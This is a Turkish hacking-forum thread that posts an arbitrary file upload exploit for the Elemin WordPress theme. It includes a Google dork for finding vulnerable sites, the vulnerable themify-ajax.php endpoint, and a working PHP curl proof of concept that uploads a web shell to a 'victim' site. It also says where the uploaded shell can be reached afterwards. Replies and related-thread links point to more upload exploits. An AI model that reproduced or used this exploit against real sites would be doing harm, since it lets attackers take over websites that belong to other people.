Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Elemin Shell Upload
#1
Exploit Title : Wordpress Themes Elemin Arbitrary File Upload Vulnerability

#Vendor : http://themify.me/
#Download : http://themify.me/themes/Elemin
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload
#Tested On : Windows 7 32-bit | Google Chrome


#Dork : inurl:/wp-content/themes/elemin/

#
Kod:
Exploit : http://victim/[PATH]/wp-content/themes/elemin/themify/themify-ajax.php

#POC :

Kod:
<?php
$uploadfile="ReC0ded.php";
$ch = curl_init("http://victim/[PATH]/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Kod:
#Results See Your Shell On : http://victim/[PATH]/wp-content/themes/elemin/uploads/{YOUR_FILE}.php
Beğenenler:
#2
Eline Sağlık
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 71 4,349 4 saat önce
Son Yorum: Trajedi
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 526 Bugün, Saat: 00:10
Son Yorum: Slowycan
  sacro CMS unrestricted upload You LosT 3 182 30-11-2016, Saat: 02:51
Son Yorum: 0xfans
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 10 165 27-11-2016, Saat: 11:37
Son Yorum: R3D
  WordPress store theme Upload Acıgı archavin 72 4,748 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
Anahtar Kelimeler

WordPress Elemin Shell Upload indir, WordPress Elemin Shell Upload Videosu, WordPress Elemin Shell Upload Online izle, WordPress Elemin Shell Upload Bedava indir, WordPress Elemin Shell Upload Yükle, WordPress Elemin Shell Upload Hakkında, WordPress Elemin Shell Upload Nedir, WordPress Elemin Shell Upload Free indir, WordPress Elemin Shell Upload Oyunu, WordPress Elemin Shell Upload Download


1 Ziyaretçi